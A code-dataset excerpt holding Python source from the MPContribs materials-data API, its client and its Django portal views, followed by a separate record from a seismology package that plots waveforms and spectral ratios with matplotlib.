"last_modified": [ops.Gte, ops.Lte],
re.compile(r"^data__((?!__).)*$"): [ops.Contains, ops.Gte, ops.Lte],
}
fields = ["id", "project", "identifier", "formula", "is_public", "last_modified"]
allowed_ordering = [
"id",
"project",
"identifier",
"formula",
"is_public",
"last_modified",
re.compile(r"^data(__(" + exclude + ")+){1,3}$"),
]
paginate = True
default_limit = 20
max_limit = 250
download_formats = ["json", "csv"]
@staticmethod
def get_optional_fields():
return ["data", "structures", "tables"]
def value_for_field(self, obj, field):
if not field.startswith("structures") and not field.startswith("tables"):
raise UnknownFieldError
field_split = field.split(".")
field_len = len(field_split)
if field_len > 2:
raise UnknownFieldError
# add structures and tables info to response if requested
from mpcontribs.api.structures.views import StructuresResource
from mpcontribs.api.tables.views import TablesResource
mask = ["id", "label", "name"]
# return full structures/tables only if download requested
full = bool(
self.view_method == Download and self.params.get("_fields") == "_all"
)
fmt = self.params.get("format")
kwargs = dict(contribution=obj.id)
if field_len == 2:
# requested structure/table(s) for specific label
kwargs["label"] = field_split[1]
if field.startswith("structures"):
res = StructuresResource(view_method=self.view_method)
if full and fmt == "json":
mask += ["lattice", "sites", "charge", "klass", "module"]
objects = Structures.objects.only(*mask)
else:
res = TablesResource(view_method=self.view_method)
# TODO adjust mask for full json format
objects = Tables.objects.only(*mask)
objects = objects.filter(**kwargs).order_by("-id")
result = defaultdict(list)
for o in objects:
os = res.serialize(o, fields=mask)
# TODO res.value_for_field(o, "cif") if fmt == "csv" and field.startswith("structures")
result[os.pop("label")].append(os)
ret = result if field_len == 1 else list(result.values())[0]
obj.update(**{f"set__{field.replace('.', '__')}": ret})
return ret
class ContributionsView(SwaggerView):
resource = ContributionsResource
methods = [
Fetch,
Delete,
Update,
BulkFetch,
BulkCreate,
BulkUpdate,
BulkDelete,
Download,
]
```
#### File: mpcontribs/api/core.py
```python
import os
import logging
import yaml
from typing import Pattern
from importlib import import_module
from flask.views import MethodViewType
from flasgger.marshmallow_apispec import SwaggerView as OriginalSwaggerView
from marshmallow_mongoengine import ModelSchema
from flask_mongorest.views import ResourceView
from mongoengine.queryset.visitor import Q
from werkzeug.exceptions import Unauthorized
from mpcontribs.api.config import SWAGGER
logger = logging.getLogger("app")
def get_specs(klass, method, collection):
method_name = (
method.__name__ if getattr(method, "__name__", None) is not None else method
)
default_response = {
"description": "Error",
"schema": {"type": "object", "properties": {"error": {"type": "string"}}},
}
fields_param = None
if klass.resource.fields is not None:
fields_avail = (
klass.resource.fields + klass.resource.get_optional_fields() + ["_all"]
)
description = f"List of fields to include in response ({fields_avail})."
description += " Use dot-notation for nested subfields."
fields_param = {
"name": "_fields",
"in": "query",
"default": klass.resource.fields,
"type": "array",
"items": {"type": "string"},
"description": description,
}
field_pagination_params = []
for field, limits in klass.resource.fields_to_paginate.items():
field_pagination_params.append(
{
"name": f"{field}_page",
"in": "query",
"default": 1,
"type": "integer",
"description": f"page to retrieve for {field} field",
}
)
field_pagination_params.append(
{
"name": f"{field}_per_page",
"in": "query",
"default": limits[0],
"maximum": limits[1],
"type": "integer",
"description": f"number of items to retrieve per page for {field} field",
}
)
limit_params = [
{
"name": "_skip",
"in": "query",
"type": "integer",
"description": "number of items to skip",
},
{
"name": "_limit",
"in": "query",
"type": "integer",
"description": "maximum number of items to return",
},
{
"name": "page",
"in": "query",
"type": "integer",
"description": "page number to return (in batches of `per_page/_limit`; alternative to `_skip`)",
},
{
"name": "per_page",
"in": "query",
"type": "integer",
"description": "maximum number of items to return per page (same as `_limit`)",
},
]
filter_params = []
if getattr(klass.resource, "filters", None) is not None:
for k, v in klass.resource.filters.items():
label = k.pattern if isinstance(k, Pattern) else k
for op in v:
filter_params.append(
{
"name": label if op.op == "exact" else f"{label}__{op.op}",
"in": "query",
"type": op.typ,
"description": f"filter {label}"
if op.op == "exact"
else f"filter {label} via ${op.op}",
}
)
if op.typ == "array":
filter_params[-1]["items"] = {"type": "string"}
order_params = []
if klass.resource.allowed_ordering:
allowed_ordering = [
o.pattern if isinstance(o, Pattern) else o
for o in klass.resource.allowed_ordering
]
order_params = [
{
"name": "_order_by",
"in": "query",
"type": "string",
"description": f"order {collection} via {allowed_ordering}",
},
{
"name": "order",
"in": "query",
"type": "string",
"description": f"order {collection} *asc* or *desc*",
},
]
spec = None
if method_name == "Fetch":
params = [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"{collection[:-1]} (primary key)",
}
]
if fields_param is not None:
params.append(fields_param)
params += field_pagination_params
spec = {
"summary": f"Retrieve a {collection[:-1]}.",
"operationId": "get_entry",
"parameters": params,
"responses": {
200: {
"description": f"single {collection} entry",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkFetch":
params = [fields_param] if fields_param is not None else []
params += field_pagination_params
params += order_params
params += filter_params
schema_props = {
"data": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
}
}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and retrieve {collection}.",
"operationId": "get_entries",
"parameters": params,
"responses": {
200: {
"description": f"list of {collection}",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "Download":
params = [
{
"name": "short_mime",
"in": "path",
"type": "string",
"required": True,
"description": f"MIME Download Type: gz",
"default": "gz",
},
{
"name": "format",
"in": "query",
"type": "string",
"required": True,
"description": f"download {collection} in different formats: {klass.resource.download_formats}",
},
]
params += [fields_param] if fields_param is not None else []
params += order_params
params += filter_params
spec = {
"summary": f"Filter and download {collection}.",
"operationId": "download_entries",
"parameters": params,
"produces": ["application/gzip"],
"responses": {
200: {
"description": f"{collection} download",
"schema": {"type": "file"},
},
"default": default_response,
},
}
elif method_name == "Create":
spec = {
"summary": f"Create a new {collection[:-1]}.",
"operationId": "create_entry",
"parameters": [
{
"name": f"{collection[:-1]}",
"in": "body",
"description": f"The object to use for {collection[:-1]} creation",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
}
],
"responses": {
200: {
"description": f"{collection[:-1]} created",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkCreate":
spec = {
"summary": f"Create new {collection[:-1]}(s).",
"operationId": "create_entries",
"parameters": [
{
"name": f"{collection}",
"in": "body",
"description": f"The objects to use for {collection[:-1]} creation",
"schema": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
},
}
],
"responses": {
200: {
"description": f"{collection} created",
"schema": {
"type": "object",
"properties": {
"count": {"type": "integer"},
"data": {
"type": "array",
"items": {"$ref": f"#/definitions/{klass.schema_name}"},
},
},
},
},
"default": default_response,
},
}
elif method_name == "Update":
spec = {
"summary": f"Update a {collection[:-1]}.",
"operationId": "update_entry",
"parameters": [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"The {collection[:-1]} (primary key) to update",
},
{
"name": f"{collection[:-1]}",
"in": "body",
"description": f"The object to use for {collection[:-1]} update",
"schema": {"type": "object"},
},
],
"responses": {
200: {
"description": f"{collection[:-1]} updated",
"schema": {"$ref": f"#/definitions/{klass.schema_name}"},
},
"default": default_response,
},
}
elif method_name == "BulkUpdate":
params = filter_params
params.append(
{
"name": f"{collection}",
"in": "body",
"description": f"The object to use for {collection} bulk update",
"schema": {"type": "object"},
}
)
schema_props = {"count": {"type": "integer"}}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and update {collection}.",
"operationId": "update_entries",
"parameters": params,
"responses": {
200: {
"description": f"Number of {collection} updated",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "BulkDelete":
params = filter_params
schema_props = {"count": {"type": "integer"}}
if klass.resource.paginate:
schema_props["has_more"] = {"type": "boolean"}
schema_props["total_count"] = {"type": "integer"}
schema_props["total_pages"] = {"type": "integer"}
params += limit_params
spec = {
"summary": f"Filter and delete {collection}.",
"operationId": "delete_entries",
"parameters": params,
"responses": {
200: {
"description": f"Number of {collection} deleted",
"schema": {"type": "object", "properties": schema_props},
},
"default": default_response,
},
}
elif method_name == "Delete":
spec = {
"summary": f"Delete a {collection[:-1]}.",
"operationId": "delete_entry",
"parameters": [
{
"name": "pk",
"in": "path",
"type": "string",
"required": True,
"description": f"The {collection[:-1]} (primary key) to delete",
}
],
"responses": {
200: {"description": f"{collection[:-1]} deleted"},
"default": default_response,
},
}
return spec
# https://github.com/pallets/flask/blob/master/flask/views.py
class SwaggerViewType(MethodViewType):
"""Metaclass for `SwaggerView` defining custom attributes"""
def __init__(cls, name, bases, d):
"""initialize Schema, decorators, definitions, and tags"""
super(SwaggerViewType, cls).__init__(name, bases, d)
if not __name__ == cls.__module__:
# e.g.: cls.__module__ = mpcontribs.api.projects.views
views_path = cls.__module__.split(".")
doc_path = ".".join(views_path[:-1] + ["document"])
cls.tags = [views_path[-2]]
doc_filepath = doc_path.replace(".", os.sep) + ".py"
if os.path.exists(doc_filepath):
cls.doc_name = cls.tags[0].capitalize()
Model = getattr(import_module(doc_path), cls.doc_name)
cls.schema_name = cls.doc_name + "Schema"
cls.Schema = type(
cls.schema_name,
(ModelSchema, object),
{
"Meta": type(
"Meta",
(object,),
dict(model=Model, ordered=True, model_build_obj=False),
)
},
)
cls.definitions = {cls.schema_name: cls.Schema}
cls.resource.schema = cls.Schema
# write flask-mongorest swagger specs
for method in cls.methods:
spec = get_specs(cls, method, cls.tags[0])
if spec:
dir_path = os.path.join(SWAGGER["doc_dir"], cls.tags[0])
file_path = os.path.join(dir_path, method.__name__ + ".yml")
if not os.path.exists(file_path):
os.makedirs(dir_path, exist_ok=True)
with open(file_path, "w") as f:
yaml.dump(spec, f)
logger.warning(
f"{cls.tags[0]}.{method.__name__} written to {file_path}"
)
class SwaggerView(OriginalSwaggerView, ResourceView, metaclass=SwaggerViewType):
"""A class-based view defining additional methods"""
def get_groups(self, request):
groups = request.headers.get("X-Consumer-Groups")
return [] if groups is None else groups.split(",")
def is_admin_or_project_user(self, request, obj):
groups = self.get_groups(request)
if hasattr(obj, "is_approved"):
is_approved = obj.is_approved
owner = obj.owner
project = obj.project
elif hasattr(obj, "project"):
is_approved = obj.project.is_approved
owner = obj.project.owner
project = obj.project.id
else:
is_approved = obj.contribution.project.is_approved
owner = obj.contribution.project.owner
project = obj.contribution.project.id
username = request.headers.get("X-Consumer-Username")
return "admin" in groups or (
(project in groups or owner == username) and is_approved
)
def has_read_permission(self, request, qs):
groups = self.get_groups(request)
if "admin" in groups:
return qs # admins can read all entries
# only read public or approved project entries
username = request.headers.get("X-Consumer-Username")
qfilter = Q(is_public=True)
if groups:
qfilter |= Q(project__in=groups, is_approved=True)
if username:
qfilter |= Q(owner=username, is_approved=True)
if request.path.startswith("/projects/"):
return qs.filter(qfilter)
# project or contribution are LazyReferenceFields (multiple queries)
module = import_module("mpcontribs.api.projects.document")
Projects = getattr(module, "Projects")
projects = Projects.objects.only("project").filter(qfilter)
qfilter = Q(is_public=True) | Q(project__in=projects)
if not request.path.startswith("/contributions/"):
module = import_module("mpcontribs.api.contributions.document")
Contributions = getattr(module, "Contributions")
contributions = Contributions.objects.only("id").filter(qfilter)
qfilter = Q(is_public=True) | Q(contribution__in=contributions)
return qs.filter(qfilter)
def has_add_permission(self, request, obj):
if not self.is_admin_or_project_user(request, obj):
return False
if hasattr(obj, "identifier") and obj.project.unique_identifiers:
if self.resource.document.objects(
project=obj.project.id, identifier=obj.identifier
).count():
raise Unauthorized(
f"{obj.identifier} already added for {obj.project.id}"
)
return True
def has_change_permission(self, request, obj):
return self.is_admin_or_project_user(request, obj)
def has_delete_permission(self, request, obj):
return self.is_admin_or_project_user(request, obj)
```
#### File: mpcontribs/client/__init__.py
```python
import os
import fido
import warnings
import pandas as pd
from pyisemail import is_email
from pyisemail.diagnosis import BaseDiagnosis
from swagger_spec_validator.common import SwaggerValidationError
from bravado_core.formatter import SwaggerFormat
from bravado.client import SwaggerClient
from bravado.fido_client import FidoClient # async
from bravado.http_future import HttpFuture
from bravado.swagger_model import Loader
from bravado.config import bravado_config_from_config_dict
from bravado_core.spec import Spec
from json2html import Json2Html
from IPython.display import display, HTML
from boltons.iterutils import remap
from pymatgen import Structure
DEFAULT_HOST = "api.mpcontribs.org"
HOST = os.environ.get("MPCONTRIBS_API_HOST", DEFAULT_HOST)
BULMA = "is-bordered is-striped is-narrow is-hoverable is-fullwidth"
j2h = Json2Html()
pd.options.plotting.backend = "plotly"
warnings.formatwarning = lambda msg, *args, **kwargs: f"{msg}\n"
warnings.filterwarnings("default", category=DeprecationWarning, module=__name__)
def validate_email(email_string):
d = is_email(email_string, diagnose=True)
if d > BaseDiagnosis.CATEGORIES["VALID"]:
raise SwaggerValidationError(f"{email_string} {d.message}")
email_format = SwaggerFormat(
format="email",
to_wire=str,
to_python=str,
validate=validate_email,
description="e-mail address",
)
class FidoClientGlobalHeaders(FidoClient):
def __init__(self, headers=None):
super().__init__()
self.headers = headers or {}
def request(self, request_params, operation=None, request_config=None):
request_for_twisted = self.prepare_request_for_twisted(request_params)
request_for_twisted["headers"].update(self.headers)
future_adapter = self.future_adapter_class(fido.fetch(**request_for_twisted))
return HttpFuture(
future_adapter, self.response_adapter_class, operation, request_config
)
def visit(path, key, value):
if isinstance(value, dict) and "display" in value:
return key, value["display"]
return key not in ["value", "unit"]
class Dict(dict):
def pretty(self, attrs=f'class="table {BULMA}"'):
return display(
HTML(j2h.convert(json=remap(self, visit=visit), table_attributes=attrs))
)
def load_client(apikey=None, headers=None, host=HOST):
warnings.warn(
"load_client(...) is deprecated, use Client(...) instead", DeprecationWarning
)
# TODO data__ regex doesn't work through bravado/swagger client
class Client(SwaggerClient):
"""client to connect to MPContribs API
We only want to load the swagger spec from the remote server when needed and not everytime the
client is initialized. Hence using the Borg design nonpattern (instead of Singleton): Since the
__dict__ of any instance can be re-bound, Borg rebinds it in its __init__ to a class-attribute
dictionary. Now, any reference or binding of an instance attribute will actually affect all
instances equally.
"""
_shared_state = {}
def __init__(self, apikey=None, headers=None, host=HOST):
# - Kong forwards consumer headers when api-key used for auth
# - forward consumer headers when connecting through localhost
self.__dict__ = self._shared_state
self.apikey = apikey
self.headers = {"x-api-key": apikey} if apikey else headers
self.host = host
if "swagger_spec" not in self.__dict__ or (
self.headers is not None
and self.swagger_spec.http_client.headers != self.headers
):
http_client = FidoClientGlobalHeaders(headers=self.headers)
loader = Loader(http_client)
protocol = "https" if self.apikey else "http"
origin_url = f"{protocol}://{self.host}/apispec.json"
spec_dict = loader.load_spec(origin_url)
spec_dict["host"] = self.host
spec_dict["schemes"] = [protocol]
config = {
"validate_responses": False,
"use_models": False,
"include_missing_properties": False,
"formats": [email_format],
}
bravado_config = bravado_config_from_config_dict(config)
for key in set(bravado_config._fields).intersection(set(config)):
del config[key]
config["bravado"] = bravado_config
swagger_spec = Spec.from_dict(spec_dict, origin_url, http_client, config)
super().__init__(
swagger_spec, also_return_response=bravado_config.also_return_response
)
def get_project(self, project):
"""Convenience function to get full project entry and display as HTML table"""
return Dict(self.projects.get_entry(pk=project, _fields=["_all"]).result())
def get_contribution(self, cid):
"""Convenience function to get full contribution entry and display as HTML table"""
return Dict(self.contributions.get_entry(pk=cid, _fields=["_all"]).result())
def get_table(self, tid):
"""Convenience function to get full Pandas DataFrame for a table."""
page, pages = 1, None
table = {"data": []}
while pages is None or page <= pages:
res = self.tables.get_entry(
pk=tid, _fields=["_all"], data_page=page, data_per_page=1000
).result()
if "columns" not in table:
pages = res["total_data_pages"]
table["columns"] = res["columns"]
table["data"].extend(res["data"])
page += 1
return pd.DataFrame.from_records(
table["data"], columns=table["columns"], index=table["columns"][0]
)
def get_structure(self, sid):
"""Convenience function to get pymatgen structure."""
return Structure.from_dict(
self.structures.get_entry(
pk=sid, _fields=["lattice", "sites", "charge"]
).result()
)
```
#### File: mpcontribs/portal/views.py
```python
import os
import json
import nbformat
from glob import glob
from nbconvert import HTMLExporter
from bs4 import BeautifulSoup
from fido.exceptions import HTTPTimeoutError
from json2html import Json2Html
from boltons.iterutils import remap
from django.shortcuts import render, redirect
from django.template import RequestContext
from django.http import HttpResponse
from django.template.loaders.app_directories import get_app_template_dirs
from django.template.loader import select_template
from mpcontribs.client import Client
S3_DOWNLOADS_BUCKET = os.environ.get("S3_DOWNLOADS_BUCKET", "mpcontribs-downloads")
S3_DOWNLOAD_URL = f"https://{S3_DOWNLOADS_BUCKET}.s3.amazonaws.com/"
j2h = Json2Html()
def visit(path, key, value):
if isinstance(value, dict) and "display" in value:
return key, value["display"]
return key not in ["value", "unit"]
def get_consumer(request):
names = ["X-Consumer-Groups", "X-Consumer-Username"]
headers = {}
for name in names:
key = f'HTTP_{name.upper().replace("-", "_")}'
value = request.META.get(key)
if value is not None:
headers[name] = value
return headers
def get_context(request):
ctx = RequestContext(request)
ctx["API_CNAME"] = os.environ["API_CNAME"]
ctx["API_PORT"] = os.environ["API_PORT"]
ctx["TRADEMARK"] = os.environ.get("TRADEMARK", "")
return ctx
def landingpage(request):
ctx = get_context(request)
try:
project = request.path.replace("/", "")
client = Client(headers=get_consumer(request))
prov = client.projects.get_entry(pk=project, _fields=["_all"]).result()
ctx["project"] = project
long_title = prov.get("long_title")
ctx["title"] = long_title if long_title else prov["title"]
ctx["descriptions"] = prov["description"].strip().split(".", 1)
authors = prov["authors"].strip().split(",", 1)
ctx["authors"] = {"main": authors[0].strip()}
if len(authors) > 1:
ctx["authors"]["etal"] = authors[1].strip()
ctx["urls"] = prov["urls"]
other = prov.get("other", "")
if other:
ctx["other"] = j2h.convert(
json=remap(other, visit=visit),
table_attributes='class="table is-bordered is-striped is-narrow is-hoverable is-fullwidth"',
)
if prov["columns"]:
ctx["columns"] = ["identifier", "id", "formula"] + list(
prov["columns"].keys()
)
ctx["search_columns"] = ["identifier", "formula"] + [
col
for col in prov["columns"].keys()
if not col.endswith("]") and not col.startswith("structures")
]
ctx["ranges"] = json.dumps(prov["columns"])
except Exception as ex:
ctx["alert"] = str(ex)
templates = [f"{project}_index.html", "landingpage.html"]
template = select_template(templates)
return HttpResponse(template.render(ctx.flatten(), request))
def index(request):
ctx = get_context(request)
cname = os.environ["PORTAL_CNAME"]
template_dir = get_app_template_dirs("templates/notebooks")[0]
htmls = os.path.join(template_dir, cname, "*.html")
ctx["notebooks"] = [
p.split("/" + cname + "/")[-1].replace(".html", "") for p in glob(htmls)
]
ctx["PORTAL_CNAME"] = cname
ctx["landing_pages"] = []
mask = ["project", "title", "authors", "is_public", "description", "urls"]
client = Client(headers=get_consumer(request)) # sets/returns global variable
entries = client.projects.get_entries(_fields=mask).result()["data"]
for entry in entries:
authors = entry["authors"].strip().split(",", 1)
if len(authors) > 1:
authors[1] = authors[1].strip()
entry["authors"] = authors
entry["description"] = entry["description"].split(".", 1)[0] + "."
ctx["landing_pages"].append(
entry
) # visibility governed by is_public flag and X-Consumer-Groups header
return render(request, "home.html", ctx.flatten())
def export_notebook(nb, cid):
nb = nbformat.from_dict(nb)
html_exporter = HTMLExporter()
html_exporter.template_file = "basic"
return html_exporter.from_notebook_node(nb)
def contribution(request, cid):
ctx = get_context(request)
client = Client(headers=get_consumer(request)) # sets/returns global variable
contrib = client.contributions.get_entry(pk=cid, _fields=["_all"]).result()
ctx["identifier"], ctx["cid"] = contrib["identifier"], contrib["id"]
nb = client.notebooks.get_entry(pk=cid).result() # generate notebook with cells
ctx["ncells"] = len(nb["cells"])
if not nb["cells"][-1]["outputs"]:
try:
nb = client.notebooks.get_entry(pk=cid).result(
timeout=1
) # trigger cell execution
except HTTPTimeoutError as e:
dots = '<span class="loader__dot">.</span><span class="loader__dot">.</span><span class="loader__dot">.</span>'
ctx["alert"] = f"Detail page is building in the background {dots}"
ctx["nb"], ctx["js"] = export_notebook(nb, cid)
return render(request, "contribution.html", ctx.flatten())
def cif(request, sid):
client = Client(headers=get_consumer(request)) # sets/returns global variable
cif = client.structures.get_entry(pk=sid, _fields=["cif"]).result()["cif"]
if cif:
response = HttpResponse(cif, content_type="text/plain")
response["Content-Disposition"] = "attachment; filename={}.cif".format(sid)
return response
return HttpResponse(status=404)
def download_json(request, cid):
client = Client(headers=get_consumer(request)) # sets/returns global variable
contrib = client.contributions.get_entry(pk=cid, fields=["_all"]).result()
if contrib:
jcontrib = json.dumps(contrib)
response = HttpResponse(jcontrib, content_type="application/json")
response["Content-Disposition"] = "attachment; filename={}.json".format(cid)
return response
return HttpResponse(status=404)
def csv(request, project):
from pandas import DataFrame
from pandas.io.json._normalize import nested_to_record
client = Client(headers=get_consumer(request)) # sets/returns global variable
contribs = client.contributions.get_entries(
project=project, _fields=["identifier", "id", "formula", "data"]
).result()[
"data"
] # first 20 only
data = []
for contrib in contribs:
data.append({})
for k, v in nested_to_record(contrib, sep=".").items():
if v is not None and not k.endswith(".value") and not k.endswith(".unit"):
vs = v.split(" ")
if k.endswith(".display") and len(vs) > 1:
key = k.replace("data.", "").replace(".display", "") + f" [{vs[1]}]"
data[-1][key] = vs[0]
else:
data[-1][k] = v
df = DataFrame(data)
response = HttpResponse(df.to_csv(), content_type="text/csv")
response["Content-Disposition"] = "attachment; filename={}.csv".format(project)
return response
def download(request, project):
cname = os.environ["PORTAL_CNAME"]
s3obj = f"{S3_DOWNLOAD_URL}{cname}/{project}.json.gz"
return redirect(s3obj)
# TODO check if exists, generate if not, progressbar...
# return HttpResponse(status=404)
def notebooks(request, nb):
return render(
request, os.path.join("notebooks", os.environ["PORTAL_CNAME"], nb + ".html")
)
def healthcheck(request):
return HttpResponse("OK")
``` |
{
"source": "Johumel/SAES",
"score": 3
} |
#### File: saes/create_plots/create_plots.py
```python
import matplotlib.transforms as transforms
from matplotlib.ticker import MaxNLocator, LogLocator
import matplotlib.pyplot as plt
import numpy as np
from ..handlers.save_output import save_output
from ..optimizer.fit_sin_spec import fit_sin_spec
from ..optimizer.fit_sin_spec_pll import fit_sin_spec_pll
from ..optimizer.sinspec_model import sinspec_model
from matplotlib import colors as clors
def colorlist(numspec):
if numspec < 27:
colortype = [ 'r', 'y','skyblue','rebeccapurple','peru','sienna',\
'indigo','purple','pink','palevioletred','turquoise',\
'coral','tomato','lightsteelblue','teal','firebrick',\
'orchid','olivedrab','bisque','thistle','orangered',\
'darkcyan','wheat','azure','salmon','linen']
else:
colors = dict(clors.BASE_COLORS, **clors.CSS4_COLORS)
hsv_sort = sorted((tuple(clors.rgb_to_hsv(clors.to_rgba(color)[:3])),
name)
for name, color in colors.items())
colortype = list(set([name for hsv, name in hsv_sort]))
return colortype
def plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,evtype,axz,wv):
'''
This is used to plot waveforms of the event pairs shown in the
spectral ratio figure.
Input:
-------
stn --> event waveforms (3-components if available)
nsstart --> noise start time (UTC)
Ptime --> P-phase arrival time (UTC)
Stime --> S-phase arrival time (UTC)
time_win --> Time window length (seconds)
evtype --> event type (main or egf)
axz --> figure axes of the spectral ratio plot
wv --> wave type (P or S)
Return:
--------
None
'''
if axz:
if wv.upper() == 'S':
tr = stn.select(component= 'T')[0]
elif wv.upper() == 'P':
tr = stn.select(component='Z')[0]
nsstart = nsstart - tr.stats.starttime
axz.plot(tr.times(reftime = tr.stats.starttime) , tr.data, "k-",
label = tr.stats.channel)
axz.set_ylabel('Velocity (m/s)',fontsize = 23,fontweight='bold')
leg = axz.legend(loc=3,fontsize = 18,handlelength=0, handletextpad=0)
for item in leg.legendHandles:
item.set_visible(False)
axz.annotate("", xy=(nsstart, max(tr.data)*0.15),
xytext=(time_win+nsstart, max(tr.data)*0.15),
arrowprops=dict(arrowstyle="<->",facecolor='k'))
axz.text(nsstart+(time_win*0.3), 0.65,'Ns',fontsize=20,
fontweight='bold',
transform=transforms.blended_transform_factory(axz.transData,
axz.transAxes))
if Stime and self.wvtype2 == 'S':
Stimex = Stime - tr.stats.starttime
axz.text(Stimex - 0.85, max(tr.data)*0.7,'S',fontsize=22,
fontweight='bold')
axz.annotate("", xy=(Stimex - 0.55, max(tr.data)*0.75),
xytext=(Stimex - 0.15, max(tr.data)*0.20),
arrowprops=dict(arrowstyle="<-",facecolor='k',
connectionstyle="arc3"))
if Ptime and self.wvtype1 == 'P':
Ptimex = Ptime - tr.stats.starttime
axz.text(Ptimex - 0.85, max(tr.data)*0.5,'P',fontsize=22,
fontweight='bold')
axz.annotate("", xy=(Ptimex - 0.55, max(tr.data)*0.55),
xytext=(Ptimex - 0.15, max(tr.data)*0.05),
arrowprops=dict(arrowstyle="<-",facecolor='k',
connectionstyle="arc3"))
axz.tick_params(axis='both',which='both',length=5.,labelsize='large')
axz.get_yaxis().get_major_formatter().set_powerlimits((0, 0))
for tick in axz.yaxis.get_major_ticks():
tick.label.set_fontsize(24)
for tick in axz.xaxis.get_major_ticks():
tick.label.set_fontsize(24)
axz.set_xlim([0,max(tr.times(reftime = tr.stats.starttime))])
axz.yaxis.get_offset_text().set_fontsize(24)
axz.set_xlabel('Time (s)',fontsize = 26,fontweight='bold')
if evtype[0] == 'e':
axz.set_title('%s' % ('Auxiliary event'),fontweight='bold',
fontsize=22)
axz.text(0.2,0.10,tr.stats.station.strip(),fontsize=22,
fontweight='bold',transform=axz.transAxes)
else:
axz.set_title('%s' % ('Main event'),fontweight='bold',fontsize=22)
axz.set_title('%s%s' % (evtype.capitalize(),' event'),
fontweight='bold',fontsize=22)
axz.text(0.2,0.10,stn[0].stats.station.strip(),fontsize=22,
fontweight='bold',transform=axz.transAxes)
axz.yaxis.set_major_locator(MaxNLocator(integer=True,nbins=3))
axz.xaxis.set_major_locator(MaxNLocator(integer=True,nbins=5))
return None
def make_figures_spec(self,specmain,freqmain,wmfc,wm,wmn,wefc,we,wen,indexx,
time_win,mainfile,egffile,wv):
'''
Function for creating and organizing the spectra ratio plots.
All the subplots (axes) are initiated and organized here.
'''
from obspy.core import read
from ..analyzer import get_sig_nois_data
lste = list(specmain.keys())
colortype = colorlist(len(lste))
fig = plt.figure(1,figsize=(16,9),tight_layout=True)
fig.subplots_adjust(hspace = .2,wspace=0.1)
ax_spec = plt.subplot2grid((3, 2), (1, 1), rowspan = 2,colspan = 1)
axx = plt.subplot2grid((3, 2), (1, 0), rowspan = 2)
colornum = 0
Ptime,Stime = None,None
if indexx:
et1 = egffile[indexx]
axs = plt.subplot2grid((3, 2), (0, 1))
st = read(et1)
if self.S_tt[self.egfev]:
for i in self.S_tt[self.egfev]:
if i[1] == st[0].stats.station.strip():
Stime = i[0]
if self.P_tt[self.egfev]:
for i in self.P_tt[self.egfev]:
if i[1] == st[0].stats.station.strip():
Ptime = i[0]
origtime = self.evlist[self.egfev][0]
baz = self.baz['egf']
if baz < 0:
baz = baz + 360
_,_,nsstart,stn,_ = get_sig_nois_data(self,et1,origtime,Ptime,Stime,
time_win,True,None,self.egfev,
baz,'yes')
trn = stn.select(component='N')
trn += stn.select(component='E')
trn.rotate('NE->RT',back_azimuth=baz)
stn[1] = trn[1]
plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,'egf',axs,wv)
et2 = mainfile[indexx]
if self.S_tt[self.mainev]:
for i in self.S_tt[self.mainev]:
if i[1] == st[0].stats.station.strip():
Stime = i[0]
if self.P_tt[self.mainev]:
for i in self.P_tt[self.mainev]:
if i[1] == st[0].stats.station.strip():
Ptime = i[0]
origtime = self.evlist[self.mainev][0]
baz = self.baz['main']
if baz < 0:
baz = baz + 360
_,_,nsstart,stn,_ = get_sig_nois_data(self,et2,origtime,Ptime,Stime,
time_win,True,None,self.mainev,
baz,'yes')
trn = stn.select(component='N')
trn += stn.select(component='E')
trn.rotate('NE->RT',back_azimuth=baz)
stn[1] = trn[1]
axs = plt.subplot2grid((3, 2), (0, 0))
plot_waveform(self,stn,nsstart,Ptime,Stime,time_win,'main',axs,wv)
for index in range(len(lste)):
station=lste[index]
ax_spec.loglog(freqmain[lste[index]],specmain[lste[index]],
linewidth = 1,color = colortype[colornum],
label = station)
if lste[index] == indexx:
if freqmain[indexx][0] == 0:
x_begin = freqmain[indexx][1]
else:
x_begin = freqmain[indexx][0]
try:
x_end = self.stationlist[indexx]['pre_filt'][2]
except:
x_end = 45.
pass
ploting(x1 = wmfc[indexx],y1 = wm[indexx],y12 = wmn[indexx],
x2 = wefc[indexx],
y2 = we[indexx],y22 = wen[indexx],ax = axx,
station = station,color = colortype[colornum],
x_begin=x_begin,x_end=x_end,wv=wv)
# xlim1 = 10**(np.floor(np.log10(x_begin)))
ax_spec.set_xlim([x_begin,x_end])
colornum += 1
return fig,ax_spec
def ploting(x1,y1,y12,x2,y2,y22,ax,station,color,x_begin,x_end,wv):
'''
Handles example event pair plot shown on the bottom left of
the spectral ratio figure. This figures gives an idea of the SNR for the
example events
'''
ax.loglog(x1,y1,linewidth = 3, label = 'Main event',color = color ) # Main event
ax.loglog(x1,y12,linewidth = 2,ls='--', alpha=0.7,
label = 'Main event noise',color=color)
ax.loglog(x2,y2,linewidth = 2, ls='-',label = 'Auxiliary event',
color='darkgray') #EGFs for single EGF analysis
ax.loglog(x2,y22,linewidth = 1.5,ls='-.',label = 'Auxiliary event noise',
color='lightgray')
ax.text(0.7,0.1,'%s wave' % wv,style = 'normal',weight='bold',size=16,
transform=ax.transAxes)
ax.text(0.7,0.9,station,style = 'normal',weight='bold',size=18,
transform = ax.transAxes)
ax.set_xlim([x_begin,x_end])
ax.set_ylim([y22[-1]*0.5,max(y1)*10])
ax.yaxis.set_major_locator(LogLocator(base=10.0, numticks=5))
